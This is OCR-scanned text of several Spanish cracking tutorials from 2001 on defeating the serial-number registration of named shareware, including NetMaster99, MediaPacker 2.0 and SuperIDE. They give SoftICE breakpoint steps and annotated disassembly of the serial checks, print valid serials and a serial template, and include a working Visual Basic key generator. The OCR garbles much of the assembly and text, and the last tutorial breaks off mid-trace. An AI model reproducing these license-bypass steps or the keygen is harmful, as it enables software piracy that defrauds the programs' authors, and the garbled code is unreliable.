:00464C35 7504 jne 00464C3B -> EAX tiene que ser 0. 

:00464C37 C645F101 mov [ebp-0F], 01 -> Otro 1 que luego se comprueba. 


La llamada al código que realiza las comparaciones se repite dos veces más un poco más abajo, así que para no 
aburriros mucho y dado que el código es más o menos el mismo pasaremos directamente a echar un vistazo dentro del 
call 00403DC4. La comparación de los cuatro últimos caracteres se realiza aquí: 


:00403DED 8B0E mov ecx, dword ptr [esi] -> Valor obtenido en la suma, [02D3]. 

:00403DEF 8B1F mov ebx, dword ptr [edi] -> Los cuatro últimos caracteres, [EFGH]. 

:00403DF1 39D9 cmp ecx, ebx -> Aquí podemos cambiar manualmente EBX para que sean iguales. 
:00403DF3 7558 ¡ne 00403E4D -> Pues eso... 

:00403DF5 4A dec edx -> EDX a 0. 

:00403DF6 7415 je 00403E0D -> Nos vamos... 


Las comparaciones del resto se realizan un poco más abajo, aquí exactamente: 


:00403E19 8B0E mov ecx, dword ptr [esi] -> [ESI] = 123. 

:00403E1B 8B1F mov ebx, dword ptr [edi] -> [EDI] = Primer valor fijo, :-) 
:00403E1D 38D9 cmp cl, bl -> Esta vez cambiamos ECX manualmente para que sean iguales. 
:00403E1F 7541 jne 00403E62 -> Sin problemas... 

:00403E21 4A dec edx -> El contador. 

:00403E22 7417 je 00403E3B -> Saltaremos al comprobar el segundo valor fijo. 
:00403E24 38FD cmp ch, bh -> Siguen las comparaciones 

:00403E26 753A ¡ne 00403E62 -> Nada que hacer... 

:00403E28 4A dec edx -> Decrece el contador. 

:00403E29 7410 je 00403E3B -> Saltaremos en la comprobación del tercer valor fijo. 
:00403E2B 81E30000FF00 and ebx, OOFFO00O -> Limpia BX. 

:00403E31 81E10000FF00 and ecx, OOFFOO0O -> Limpia CX. 

:00403E37 39D9 cmp ecx, ebx -> La última comparación... 

:00403E39 7527 ¡ne 00403E62 -> Perfecto... 

:00403E3B 01C0 add eax, eax -> Una suma que será comprobada más adelante. 
:00403E3D EB23 ¡mp 00403E62 -> Nos vamos... 


Como he comentado arriba, la llamada a este fragmento de código se repite dos veces más, las comparaciones se 
realizarán con otros dos valores fijos diferentes por este orden, 6? caracter, y finalmente los caracteres 4? y 5*. 


RESUMEN Y CONCLUSION 
Aquí va la explicación completa del proceso de formación y comprobación del Serial: 


-. El programa coge los 13 primeros caracteres del Serial. 

-. Suma sus valores hex, al resultado le pone un cero delante. 

-. Lo compara con los cuatro últimos caracteres del Serial. 

-. Luego coge los tres primeros, los compara con un valor fijo. 

-. Coge el sexto caracter y lo compara con otro valor fijo. 

-. Finalmente coge los caracteres que ocupan las posiciones 4* y 5* y los compara con otro valor fijo. 


Así que un Serial válido para obtener la versión completa de este programa consta de las siguientes partes: 
-. Los seis primeros caracteres que son fijos y vienen definidos por el programa. 
-. Siete caracteres cualquiera cuyo valor será sumado a los anteriores. 
-. El decimocuarto caracter que va por libre. 


-. El decimoquinto que es un 0. 
-. Los tres últimos que son el resultado de la suma de los 13 primeros. 


Incluso con un poco de habilidad y la calculadora del Windows puedes personalizar tu serial: 


22?22?2?ARKANIANO0O??? 
GJE, JE, JE!) 


El resultado es inmediato y de lo más satisfactorio, como se puede comprobar: 


/ a Thank. you for purchasing the full version! 

J) All restrictions have now beer removed. 
The barmer advertising will no longer be displayed. 
Please restart the program to apply the changes. 


FINALIZANDO 


Bueno, pues creo que esto es casi todo, ya se que me dejo cosas, por ejemplo ¿Que pasa después del testeo de bl y el 
"Salto crucial”?, ¿Que pasa si invertimos ese salto?, ¿Como sabe el programa que tipo de Serial es?, ¿Donde se 
realizan las comprobaciones al reiniciar el programa para aplicar los cambios? 


Esas y otras preguntas quedan por cuenta tuya. Si quieres acabar de desmenuzar el programa y necesitas alguna 
aclaración estoy en: arkanian O mailcity.com 


Saludos y hasta otra. 
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Programa: Net Master99 v1.1 


PROTECCION: NeoLite 2.0 -—- Name/Registration Key. 


Descripción: Programa para optimizar la conexión de INTERNET. 


Obtener Registration Key (Número Serie) válido para registrarnos 
y Crear un Generador de Claves en Visual Basic. 


Dificultad: Novato, Facililla, Media, ETC. 


OBJETIVO: 


DOWNLOAD : http: //www.magellass.com 

cananea Numega SoftIce 4.05, file insPEctor 4.2001 (similar), ProcDump32 
AR AS v1.6 Final, W32Dasm v8.93 (opcional), Visual Basic 6 

CRACKER: 

FECHA: 27-03-2001 


| INTRODUCCION 


NetMaster 99 es una herramienta especialmente diseñada para configurar y personalizar Internet sobre el 
"maravilloso" entorno Windows 95/98. Desde el ajuste del NDI cache, IPMTU, RevWindow, MaxMTU, Boost 
modem transfer speed, etc.), y el acceso a las opciones ocultas del Internet Explorer y Outlook Express. 


También dispone de Consejos y Trucos para mejorar nuestra productividad. Antes de comenzar el atake, hay que tener 
claro, las Herramientas que vamos a emplear, en esta "Victima" emplearemos en una primera aproximación una 
herramienta llamada file insPEctor 4.2001 - ViPER[K-FoR], nos dirá si nuestra "victima" esta empaquetada, 
compilador, etc, ... Toda esta información nos ayudara para un atake más rápido. 


Pues, nada vamos al aaaaaattttttaaaaaaaakkkkkkkkeeeeee....... 


AL ATAKE 


Arrancamos el file insPEctor 4.2001 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


(8) file insPEctor v4.2001 


En] Datos PE | +] Secciones | $ Importaciones/Exportaciones 
e E Modificar | Mo] Herramientas | 0 Acerca de... 


Reconocimiento de signaturas 
Comprimido con Neolite 2.0 


Signatura: 


<E9 A6 00 00 00 52 DC 51 00 18 C1 51 001€ Ci 
51 00 00 00 00 00 52 42 00 00 04 C4 51 00 4€ 65 
6F 40 69 74 65 20 45 78656375 74 61 62 > 


Versión de la DLL: [2.1 EA Información... 


Versión del SO: fi 0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa.o 


Pulsa espacio para ver los niveles de Ni S a : 
ión (3 Abrir archivo... ÉY Analizar GF Salir 


C:Márchivos de programa'NetkMaster I9Nm99. exe 


Pues ya esta, nos dice que el Net Master99 esta Comprimido con NeoLite 2.0 


El siguiente paso será, emplear la herramienta ProcDump32 v1.6 Final un excelente UnPacker (o desempaquetador;)), bien 
ejecutamos el ProcDump32 v1.6 Final y seleccionamos nuestra "victima" - Net Master99 y pulsamos el botón [Unpack] esperamos 
hasta que nos aparezca la ventana "Select Filename for saving...'' en mi caso, lo llamaré "Nm99_ECD.exe" a que soy original;) 
jejeje. 


=151 xi 


Unpack 
c:4win98setsystemikemel32. dil - 
c:win98setsystemimsgsrv32.exe Rebuild PE 
c:win98selsystemimprexe.exe | "Unknown* : 
c:win98sersystemimmtask.tsk  [Aspack<108 PE Editor 
c:win98setsystemimstask.exe Aspack108 Cancel 

c:win98set explorer.exe Aspack108.2 


ÓS Aspack108.3 
c:4win98seMtaskmon.exe Aspack108.4 0 


Aspack2000 

Module CodeSafe 3.< 
Hasiuk*NeoLite 
Manolo 


Bhrama Server 


User Conf. 


La siguiente aproximación, será averiguar en que lenguaje ha sido programado, como mera curiosidad;) y que mejor para esto, 
emplear el file insPEctor v4.2001. 


Pues, ya esta, nos dice que el Net Master99 esta Compilado en Borland Delphi 3.0 


(9) file insPEctor v4.2001 


Secciones | $ Importaciones/Exportaciones 
“3 Modificar | Cf Herramientas | 0 Acerca de... 


Reconocimiento de signaturas 
Compilado con Borland Delphi 3.0 


Signatura: 


<55 8B EC 83 C4 F4 53 B8 2C EC 49 DD ES 97 9F 
F6 FF 8B 1D 00 EA 49 00 68 E4 BF 49 00 64 00 
5A 00 ES 57 AD F6 FF ES 02 41 F6 FF 3D B7 00 > 


Versión de la DLL; f2.1 E Información... 


Versión del SO: fi ¿0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa.o 


Pulsa espacio para ver los niveles de G AAA Arabia (9 Ao ge salir 
compresión ca 


[C:Várchivos de programa NetMaster 99Nm99_ECD.exe | 


El siguiente paso será tracearlo, con el SoftICE emplearemos en este caso, el BP (BreakPoint) KERNEL'HMEMCPY, 
para "matar 2 pájaros de 1 tiro";), es decir: 


1”. Capturaremos el Serial Válido para nuestro Name. 
2”. Estudiaremos la Función de Generación del Serial. 


SoftICE v4.05- Capturar Serial para *FREGISTRARNOS* 


Name: +ErOser 
Serial: 999666999 <...-- Serial Dummy 


NetMaster 99 Registration 


Please enter your user name and registration code, 
EXACTLY as they appear on the instruction. 


User Name z [+ Oser 


Registration Code : [999666999 
OK Register Later | Order Form | 


Ejecutamos de nuevo el programa "victima" previamente cargado nuestra herramienta favorita SoftICE (cual sino:)) 


Repetiremos los pasos para Registrarnos y antes de pulsar el botón [OK], retornamos al SI (SoftICE) pulsando (Ctrl-D) y 
establecemos el BreakPoint 


:BPX HmemCpy 
Retornamos al programa "victima" pulsando (Ctrl-D) pulsamos el botón [OK]. 


Pantallazo, aparecemos en el SI, pulsamos [F12] y [F11] para tracear el Serial introducido, visualizando la siguiente información: 


015F:9EA3 CA0800 RETF 0008 


KERNEL'HMEMCPY 
|015F:9EA6 55 PUSH BP<ooococmmnmmmnn Aparecemos aquí 
015F:9EA7 8BEC MOV BP, SP 


015F:9F20 F36766A5 REPZ MOVSD<----=--- D ESI (visualizamos Serial Dummy=999666999) 
015F:9F2A F367A4 REPZ MOVSB<----====- ? EDI (nos indica el tamaño del Serial=9) 


[F10] traceamos, hasta llegar a lo siguiente: 


EAX=0C19B5F4 EBX=0100E204 ECX=00000000  EDX=00FCA1B0  ESI=0078E640 
EDI=0078E640 EBP=0078E4C8 ESP=0078E640 EIP=0049AAA1 
CS=017F DS=0187 SS=0187 ES=0187 FS=2E27 (GS=0000 SS:0078E4B8=00000000 


*eax = Error evaluating expression (1) 
*ebx = 42218C 

*ecx = DSCA0OF9E 

*edx = 4052452B 


:0049AA91 CALL 0042D55C 

:0049AA96 MOV EDX, [EBP-08] 

:0049AA99 MOV EAX, [EBP-04] 

:0049AA9C CALL 0049A984 ; Función Generación Serial ---> tracearemos con [FS] 
:0049AAA1 LEA EDX, [EBP-10]  ;¡ EAX = Serial Válido 

:0049AAA2 CALL 00403A3A 

:0049AAA3 RET 


:2 EAX 
0C19B5F4 0203011572<--..-.- Serial Válido para nuestro Name 


Name: +ErOser 
Serial: 203011572 


Introducimos el Serial 203011572 para el Name+Er Oser y voilá, nos aperecerá el mensaje : 


"NetMaster99 has been registered successfully!" 


(D Estudio de la Rutina de Generación del Key 


¡Veamos que nos enseña la función CALL 0049A984, la podemos estudiar de varias formas : (1) "Listado Muerto" con el 
W32Dasm 8.93, o bien, (2) Traceando con el Softlce, personalmente prefiero esta última;). 


[(---- Primer Búcle desde :0049A9D0 hasta :0049A9E4 

1:004949D0 MOVSX ESI, AX 

:004949D3 MOV EDIL, [EBP-04] 

1:004949D6 MOVZX ESI, BYTE PTR [ESI+EDI-01] ;toma 1” valor ASCH del name y lo deja en ESI 
1:0049A9DB ADD EBX, ESI ¡acumula el valor en EBX 

:0049A9DD ADD AX, 02 ;incrementa el contador en 2, es decir, apunta al 3” valor 

1:0049A9E1 CMP CX, AX 

1:0049A9F4 JGE 0049A9D0 

¡(---- Segundo Búcle desde :0049A9E6 hasta :0049A9FB 

1:0049A9E6 MOVSX EAX, DX 

1:0049A9EC MOVZX EAX, BYTE PTR [EAX+ESI-01] ¡toma 2* valor ASCII del name y lo deja en EAX 
1:0049A9F1 ADD [EBP-08], EAX  ;acumula el valor en [EBP-08] 

1:0049A9F4 ADD DX, 02 ;incrementa el contador en 2, es decir, apunta al 4” valor 

1:0049A9F8 CMP CX, DX 


| 1:0049A9FB JGE 0049A9E6 


:0049A9FD IMUL ECX, EBX, 00022713 ¡ECX = EBX * 22713h 

:0049AA03 MOV EAX, [EBP-08] ;copia el valor de EBP y dejalo en EAX 
:0049AA06 IMUL EAX ¡EAX =EAX * EAX 

:0049AA08 LEA EAX, [ECX+EAX+D72DD7] ¡EAX =ECX + EAX + D72DD7h 
:0049AA0F LEA ESTI, [EAX*2+EAX] ¡;ESI = EAX * 2 + EAX 

:0049AA1F LEA EAX, [EBP-04] ¡apunta al Name "+ErCOser" 

:0049AA22 CALL 00403434 

:0049AAA1 LEA EDX, [EBP-10] 

:0049AAA4 CALL 00407D7C 

:0049AAA9 XOR EAX, EAX 


Recapitulemos, desde la dirección :0049A9D0 hasta :0049A9E4 un búcle FOR AX=1 ... TO ... STEP 2 NEXT extrayendo 
del Name el valor ASCII y acumulando la suma ASCII en EBX y el segundo búcle desde la dirección :0049A9E6 hasta 
:0049A9FB un búcle FOR DX22... TO ... STEP 2 NEXT extrayendo del Name el valor ASCII y acumulando la suma 
ASCH en EAX después multiplica EBX * 00022713 guardando el resultado en ECX, multiplica EAX por sí mismo, 
suma EAX + ECX + D72DD7, y finalmente realiza la siguiente operación EAX * 2 + EAX guardando el resultado 
en ESL 


* Key Generator NetMaster99 v1.1 en Visual Basic 6 * 


' Nombre : Net Master99 v1.1 Keygenerator 

' Autor : +ErOser'2000 [fOR tHE nEW mILLENNIUM] 

' Creado : Martes, Marzo 27,2001 E' 00:45:22 pm (Vers: 1.0.0000) 
' Herramientas: Softlce 4.05, Visual Basic 6 


' Descripción : Net Master99 v1.1 


Private Sub Text1_Change() 
Dim nombre As String 
Dim L As Integer, x As Integer, y As Integer 
Dim eax As Long, ebx As Long, ecx As Long, esi As Long 
nombre = Trim$(Text1.Text)xt) 'quitamos blancos 
L = Len(nombre) 
ebx =0 
'I Bucle desde :0049A9D0 hasta :0049A9E4 
For x = 1 To L Step 2 
esi = Asc(Mid$(nombre, x, 1)) 
ebx = ebx + esi 
Next x 
eax =() 
'II Bucle desde :0049A9E6 hasta :0049A9FB 
For y = 2 To L Step 2 
esi = Asc(Mid$(nombre, y, 1)) 
eax = eax + esi 
Next y 
ecx = ebx * £H22713 'IMUL ECX, EBX, 00022713 
eax = eax *eax 'IMUL EAX 
eax = ecx + eax + £«HD72DD7 'LEA EAX, [ECX+EAX+00D72DD7] 
esi =eax *2+eax 'LEA ESI, [EAX*2+EAX] 
Text2.Text = esi 'Visualizamos el Serial 
¡End Sub 


Mu AAA2> A 2  — A _ AA  _ _ _ _ _— | 
Un Saludo! 


+ErOser'2000 
fOR tHE nEW mILLENNIUM 


-=AW- Your Mind ls the Power -/VV=- 


o ++ Agradecimientos +----- - 
Karpoff, Demian, Black Fenix, PrOfesor X, Numit_oR, Esiel 2, Mr. Crimson, Mr. WhiTe, Mr. GReeN, TNT, WKT, KUT y a 
TODOS los CrAcKeRs del Pasado, Presente y Futuro. 
om Hom Gr eetzannooo...--- He - 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
MediaPAcker 2.0 


Serial. 


Buscar un Numero de Serie valido 


Newbie 


http://www.Microdream.com 


Softice 


SiLvEr StOrM 


INTRODUCCION 


FECHA: 29 de marzo 2001 


Esto de la introduccion es lo que me parece mas fastidioso de hacer un tutorial. pero bueno que le hacemos..aqui vamos de 
nuevo a buscar un serial valido, y a tengo 10 tutoriales.. gracias a todos Uds...(por tener paciencia de leerwelos), espero que lo 


entiendan y les sea util. Recuerden que este tutorial esta hecho con fines netamente educativos si les interesa este 
Programa COMPRENLO. 


AL ATAKE 


Comentario del Programa 


e El programa que vamos a Busacr es un programa que les genera un archivo ejecutable desde archivos HTML, 
Mediapacker is a software que te deja crear ebooks facilmente. Usando Mediapacker tu puedes compilar 
paginas html que incluyan text, imagenes, fotos, sonidos, animaciones and movies en un portable compacto y 


atractivo E-book 


Objetivos 


1. Busacr el Serial Valido 


Manos a la Obra 


Primero instalamos nuestro programa , luego lo revisamos con File Inspector 


(9) file insPEctor 4.2 - Service Pack 1 


| E Cabezera MZ | 1] Secciones | :S Importaciones/Exportaciones | 
Y Modificar | 4 Herramientas | Sé Plug-Ins 0 Acerca de... | 


"Reconocimiento de signaturas 
Comprimido con ASPack y1.08.04 
Signatura: 
<60 Es 70 05 00 00 EB 4€ 00 00 00 00 00 00 00 


00 00 00 00 00 87 DB 90 00 40 46 00 10 40 4B 00 
D4 64 4B 00 10 60 48 00 00 00 00 00 00 00 > 


Versión de la DLL: f2.1 4 Información... 


Versión del SO: fi 0 Versión de la imagen: fo.o 
Versión del enlazador: [2.25 Versión del subsistema: fa. 


Pulsa espacio para ver los niveles de S Abrir archivo o Aralar ge Salir 
compresión Es 


[C:Archivos de programaMicrodreamtMediapacker 2.04Mediapacker. exe | 


Vemos que esta comprimido con Aspack. Podemos hacer 2 cosas, para parcharlo tendriamos que desempaketar y 
desensamblar para luego parcharlo.... esta vez lo haremos buscando un serial Valido, por lo tanto omitiremos el 
desempaketado y lo haremos con SICE. 


Ok... jeje aqui comienza la aventura. 


Abrimos nuestro Objetivo... Pobre de el... jejeje no sabe lo que le espera... 


Mediapacker 2.0 mE 


Welcome 


Mediapacker is an application created with net marketers in mind, it will allow 
you to create your own multimedia information products from HTML pages 
into a single executable file that can be easily distributed. 


Mediapacker let's pou create: e-books, newsletters, manuals, reports, 
booklets, e-zines, catalogs, tutorials, presentations, educational applications, 
2 andanything else you can create with HTML code. 


“You can also distribute pour entire website as a sinale file for perfect and 
seamless off-line navigation. 


The only requirements to run this application are: 


- Microsoft? Wlindows 95/98/NT 
- MicrosoftS Internet Explorer 4 or above 


The wizard will guide you through the creation process... 


About... | Register... | Next >> | 


Presionamos Register... 


y veremos algo como esto: 


Register Mediapacker 


User name: 


[Silver StOrh 


Company: 


[aryC 


Serial number: 


fare 
X Cancel | 


Llenamos los spacios con nuestros datos: en mi casolo pongo como ven en esta pantalla 


Prueben uds. con sus propios datos. 


Seguimos con nuetro infalible plan de conseguir el serial en la siguiente seccion.. 
A BusKar El Zeryal 


Para la busqueda de serial ----- Presionamos Control D y abrimos Softice (sice). Ponemos un Breakpiont en 
HMEMCPY y salimos de Sice con Control D. 


Presionamos Ok. 
Slce se abre...desbilitamos los breakpionts.. BC * 


Y presionamos F12 7 veces para caer en el codigo del programa... pues como Uds. saben cuando usamos el hmemcpy 
pra interrumpir el programa no cae directamente en el codigo del programa, sino en una libreria de windows por lo 
tanto hay que llegar hasta el programa que queremos tracear... 


AAAAAAAAAAAAAÁAAAAAAAAAAA AA AAA A AA A A AAA A Abyte A AAAA4SA APROTAAA(O)AA 
015F:0073DABC 0D 00 00 00 0D 00 00 00-90 D2 €C7 00 0C 00 0000 ................ - 
015F:0073DACC 14 DB 73 00 47 11 43 00-90 D2 C7 00 0B 12 43 00 ..s.G.C.......C. 
015F:0073DADC 94 DC 73 00 94 DC 73 00-14 5A C6 00 44 AF 4A 00 ..s...s..Z..D.J. 
015F:0073DAEC 0C DB 73 00 01 00 00 00-10 DB 73 00 44 DE 73 00 ..s.......s.D.s. 
015F:0073DAFC F7 AF 4A 00 14 DB 73 00-E0 55 C7 00 90 D2 C7 00 ..J...s..U...... 
015F:0073DB0C 00 00 00 00 00 00 00 00-78 DC 73 00 68 25 43 00 ........ x.s.n%C.- 
AAAAAAAAAAAAAAAAAAAAAAA AA AAAAA AA AA AAA AA A AAA AA A A A A A AAPROT32A 
0157:00428C55 CALL 00434BD4 - 

0157:00428C5A POP ESI == ----- Caemos aqui.. 

0157:00428C5B POP EBX 

0157:00428C5C RET 

0157:00428C5D LEA EAX,[EAX+00] 

0157:00428C60 PUSH ESI 

0157:00428C61 MOV ESI,EAX 

0157:00428C63 MOV EAX,ESI 

0157:00428C65 MOV ECX,[EAX] 

0157:00428C67 CALL [ECX-10] 

0157:00428C6A MOV EAX,[004B58F0] 

0157:00428C6F CMP BYTE PTR [EAX],00 

0157:00428C72 JZ 00428C9D - 


AAAAALA AAA AA A AA A A A A A AA AMEDIAPACKER!CODE+00027C55sAAAAAAALALAA AAA 
Lo que esta en amarillo es donde vemos que estamos dentro del programa... Jeje 


Presionamos F10 23 veces--- por cierto F10 sirve para ir traceando linea por linea si por ejmplo hay un call el sice 
ejecuta este call y cae en la siguiente linea, si quisieramos entrar en el call tendriamos que presionar f8 sobre el para 
entrar. 


Ok.. de regreso.. si le dimos bien, veran que cuando ven el valor de EAX (d eax) vemos nuestro nombre.. 


AAAAAAAAAAAAAAAA AA AAAAA AAA AAA A AA A A AA A A byte A AAAAA AA APROTAAA(O)AA 
015F:00C7D290 53 69 4C 76 45 72 20 53-74 4F 72 4D 00 00 00 00 SiLvEr StOrM....- 
015F:00C7D2A0 50 52 00 00 79 00 00 00-19 00 00 00 E4 01 00 00 PR..y........... 

015F:00C7D2B0 01 00 20 00 00 00 00 00-00 00 00 0000000000 .. ............. 

015F:00C7D2C0 00 00 00 00 00 00 00 00-00 00 00 00 0000 0000 ................ 

015F:00C7D2DO0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 

015F:00C7D2E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ - 
AAAAAAAAAAAAAAAAAAAAAAA AA AAA AA AAAAA AA AA A AA AA AAA AA A APROT32A 
0157:004AAF39 MOV EAX,[EBX+000002C8] - 

0157:004AAF3F CALL 004311E0 

0157:004AAF44 MOV EAX,[EBP-0C] 

0157:004AAF47 PUSH EAX 

0157:004AAF48 MOV EAX,[004B6AAS] 

0157:004AAF4D MOV EAX,[EAX+74] 

0157:004AAF30 CALL 00408C74 

0157:004AAF35 MOV ECX,EAX 

0157:004AAF57 MOV EDX,004AB00C 

0157:004AAF5C POP EAX 

0157:004AAF3D CALL 004AAA58 

0157:004AAF62 MOV EAX,[EBP-08] 

0157:004AAF65 MOV ECX,0000000F - 

AAAAAAAAA AA AÁAAAAAA AA AA A AA A A AMEDIAPACKER!CODE+000A9F39OAAAAAA LALALA 


Seguimos traceando hacia abajo... Presionamos F10 13 veces mas y vamos a ver de nuevo el valor de EAX. 
si siguieron bien deben ver nuestro serial... que es de 15 caracteres. 


AAAAAAAAAAAAAAAAAA AA AAA AA AA AA A AA A A AA A AbyteA AAAA AA APROTAAA(O)AA 
015F:00C7D2D4 44 45 36 32 38 41 39 41-35 45 45 45 32 38 31 00 DE628A9A5EEE281.- 
015F:00C7D2F4 00 00 00 00 00 00 00 00-00 00 00 00 00 00 0000 ................ 

015F:00C7D2F4 74 00 00 00 67 00 00 00-7C EE 41 00 00 00 00 00 t...g...].A..... 

015F:00C7D304 00 00 00 00 60 D3 C7 00-84 D3 C700 A0D3 (700... ooocco..... 

015F:00C7D314 79 00 00 00 19 00 00 00-20 00 CC 00 AC FE 41 00 y....... ..... A. 

015F:00C7D324 CC D1 C7 00 A4 FE 41 00-CC D1 C7 00 00 00 0000 ......A......... - 
AAAAAAAAAAAAAAAAAAAAAAA AA AAAAA AA AA AAA AA Á AAA AA A A A A A AAPROT32A 
0157:004AAF65 MOV ECX,0000000F - 

0157:004AAF6A XOR EDX,EDX 

0157:004AAF6C CALL 004040F8 

0157:004AAF71 MOV EAX,[EBP-04] 

0157:004AAF74 PUSH EAX 

0157:004AAF75 LEA EDX,[EBP-0C] 

0157:004AAF78 MOV EAX,[EBX+000002D8] 

0157:004AAF7E CALL 004311E0 

0157:004AAF83 MOV EDX,[EBP-0C] 

0157:004AAF86 POP EAX 

0157:004AAF87 CALL 00404004 

0157:004AAF8C INZ 004AAFA3 

0157:004AAFSE MOV EAX,[004B6AAS] - 
AAAAAAAAAAAAAÁAAAAA A AAA A AA A AMEDIAPACKER!CODE+000A9F6S AAA AAA LA LAA 


Anotamos este monton de cosas que vemos.. y salimos de SICE. 


Ingresamos lo que anotamos. yyy YY YYYYYYY YY YY Y YY YY YY YY YY Y YY YY Y YY 


YY YY YY Y YY YY Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y 


yy yy 


Mediapacker 2.0 XX] 


Thank You for Registering! 


Jeje... lo protegen empaketandolo y le dejan el serial tan facil de conseguir... jeje 
Por cierto este programa crea la siguiente clave en el registro 
HKLMISOFTWAREWMicrodreamWMediapacker12.0SeriaL 


Si quieren probar de nuevo borran el contenido de Serial y listo 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 
[DeK_OiN] 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


Programa: SuperIDE vl1.2.4.186 

PROTECCION: FreeWare??? - Name/Registration Key. 

Descripción: Programa para Desarrollo Integrado de Entornos (IDE). 
Obtener Número Serie válido para registrarnos y eliminar 

OBJETIVO: y ó a E 
"Banner". Crear un Generador de Claves en Visual Basic. 

Dificultad: Novato, Facililla, Media, ETC 

DOWNLOAD: http: //protostar.hypermart.net 

E Numega Softlce 4.05, Language 2000 v4.03(0 similar), DeDe v2.50, 

Herramientas: Ñ . : 
Visual Basic 6 

CRACKER: 

FECHA: 31-03-2001 


INTRODUCCION 


SuperIDE herramienta para el Desarrollo Integrado de Entornos (IDE) en el cual se puede usar varios lenguajes de 
programacion y compiladores. Por cierto, es totalmente GRATIS!!! 


Lenguajes soportados: C/C++, ObjectPascal, x86 Assembly, Java, JavaScript, Perl, SQL, LISP, Visual Basic, INL, 
HTML (con VBScript) . 


Welcome to SuperlDE!!! 


xx, Welcome To SuperiDE 


SunerlDEis FREEWARE 


Development of SuperTDE is supported by an ad banner. Although 
SuperTDE is completely free for your use, some users may find the ad 


banner to be distracting. Therefore, for your convinience, there is a 
option to "register" SuperTDE for a nominal fee and have the ad 
banners removed. Click here for details. 


Click here to subscribe to the SuperlDE AAA A A AAA 
announcement listserv (Moderated) : Y REGISTER NOW : 


[Y Show this window the next time SuperlDE starts?? Jl Close 


NOTA: Ignorar la notificacion de GRATIS. Nos dicen que debemos PAGAR para liberarnos del molesto "Banner"! y 
para recibir el Serial ... DEBE SER ESTO UNA NUEVA DEFINICION DE GRATIS!!! ... 


Antes de comenzar el atake, hay que tener claro, las Herramientas que vamos a emplear, en esta "Victima" 
emplearemos en una primera aproximación una herramienta llamada Language 2000 Database Version 4.03, nos dirá 


si nuestra "victima" esta empaquetada, compilador, etc, ... Toda esta información nos ayudara para un atake más 
rápido. 


Pues, nada vamos al aaaaaattttttaaanaaaakkkkkkkkeeeeee 


AL ATAKE 


Arrancamos el Language 2000 Database Version 4.03 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


$ C-MArchivos de programaiMichaelPowersiSuperlDESup... Pla ES 


— Version Information : 


Filename: [Super IDE exe 
Comments: fvebsite: http: //protostar.hypermart.net 
NN 
Product [ape 
Company: [Michael Powers Software 


— Compiler Information : 


Language: [object Pasear 
Company: [Borland International 
URL: facep:7/wwe.borland. com/delphiz 


— Compression * Encryption : 


Program: 
Company: 


Ey Run  $Y Open L/ View f OnTop LA About 
Database Version 4.03 - Last update on Wednesday, August 23, 2000 


> 


Pues, ya esta, nos dice que el SuperIDE esta Compilado en Borland Delphi. 


El siguiente paso será, emplear la herramienta DeDe v2.50 un excelente Desensamblador para Delphi, bien ejecutamos el Dede y 
seleccionamos nuestra "victima" - SuperIDE y pulsamos el botón [Process] esperamos hasta que nos aparezca el mensaje "Dump 
successfull !:)'"" y observaremos lo siguiente: 


¿DeDe y2.50 (c) 1999-2001 by DaFixer 
File Dumpers Tools Options ¿About 


[EXArchivos de programa+MichaelPowerstSu y] | Process | nero] 


AAA A TO 
[ Classes Info | Units Info | Forms | Procedures | Project | Exports | 


Pasame Tiene Tseire > Tormo Ta] Version: BC84 


Dede Unit List [from PACKAGEINFO) 


Dump successful ! :] 


O04554EC 0000000 
0058200C 00000000 
D0580F48 — 00000000 
D0581FC8 — DO000000 
DOS580F60 00000000 
00579000 00000000 
ad FáhetractFrror ANA7TARTA OOOO 


Thinking ... ¡SuperlDE.exe (2604544 bytes | 


La siguiente aproximación, será ¿Por donde empezamos a tracear? Pues, muy fácil, si nos fijamos en el proceso que sigue para 
registrarnos, el propio programa "victima" nos da la respuesta. Primero nos aparecerá la típica pantalla de Registración SuperIDE 


Registration con dos botones, [Register] y [Cancel], pulsamos el botón [Register] y nos aparecerá la ansiada pantalla de 
"Registration" pidiéndonos, lo siguiente: 


¿2 Reyister SuperiDE 


Registration for SuperlDE is totally optional. 

SuperlDE ¡s primarily supported by an adbar, but some users would rather not have 
this sometimes distracting element. Therefore, for those who wish, there is an option 
to have the ads removed by paying a small fee to make up for the lost revenue. 

Click on the button below to obtain a registration code, and once you have you 

can enter it here and register this copy. Upgrades are free for minor version numbers, 
for example, upgrading from version 1.4 to 1.6 would be free, but upgrading from 

1.4 to 2.1 would require an upgrade in registration. 


NOTE: IT IS ILLEGAL TO USE YOUR REGISTRATION NAME 4ND¿OR CODE ON 
MORE COMPUTERS THAN YOU HAWE PURCHASED LICENSES FOR. SEE 
LICENSE.TXT FOR DETAILS. 


177 Go to the registration site | 


Name: fueras... 
Serial Number-j9ss656394 


Y coa 


STATUS: UNREGISTERED 


SoftICE - Estudiar Generación Serial para *FREGISTRARNOS* 


Name: +ErCOser 
Serial: 999666999 ...... Serial Dummy 


Ejecutamos de nuevo el programa 'victima' previamente cargado nuestra herramienta favorita SoftICE (cual sino:)) 


Repetiremos los pasos para Registrarnos y antes de pulsar el botón [OK], retornamos al SI (SoftICE) pulsando (Ctrl-D) y 
establecemos el BreakPoint 


:BPX HmemCpy 
Retornamos al programa "victima' pulsando (Ctrl-D) pulsamos el botón [OK]. 


Pantallazo, aparecemos en el SI, pulsamos [F12] y [F11] para tracear el Serial introducido, visualizando la siguiente 
información: 


mn KERNEL'LOGERROR+0123 eocconomocacamnnmmnnmnmnmmnmnmmmmmas 
015F:9EA3 CA0800 RETF 0008 

